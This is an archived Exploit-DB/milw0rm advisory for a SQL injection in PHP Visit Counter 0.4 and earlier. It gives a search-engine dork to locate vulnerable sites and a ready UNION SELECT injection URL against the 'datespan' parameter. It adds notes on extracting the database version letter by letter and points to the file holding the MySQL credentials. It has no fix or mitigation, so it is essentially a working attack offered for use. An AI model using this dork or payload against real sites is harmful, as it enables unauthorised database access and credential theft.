PHP Visit Counter 0.4 - 'datespan' SQL Injection

EDB-ID:

5703


Platform:

PHP

Published:

2008-05-31

###############################################################
#
#           PHP Visit Counter <= 0.4 - SQL Injection Vulnerability
#                                                             
#      Vulnerability discovered by: Lidloses_Auge             
#      Greetz to:                   -=Player=- , Suicide, g4ms3, enco,
#                                   GPM, Free-Hack, Ciphercrew, h4ck-y0u
#      Date:                        30.05.2008
#
###############################################################
#                                                             
#      Dork:  inurl:"read.php?datespan="
#
#      Vulnerability:
#
#      1.) SQL Injection
#
#         1.1.) [Target]/read.php?action=read&cat=portal&datespan=null+group+by+null+union+select+1,2,ascii(substring(version(),1,1))/*
#
#      Notes:
#
#         Output is displayed as INT, so you've to convert it into ascii and
#         scan every single letter to get the whole name.
#         MySQL Data is stored in [Counterpath]/variables.php
#
###############################################################

# milw0rm.com [2008-05-31]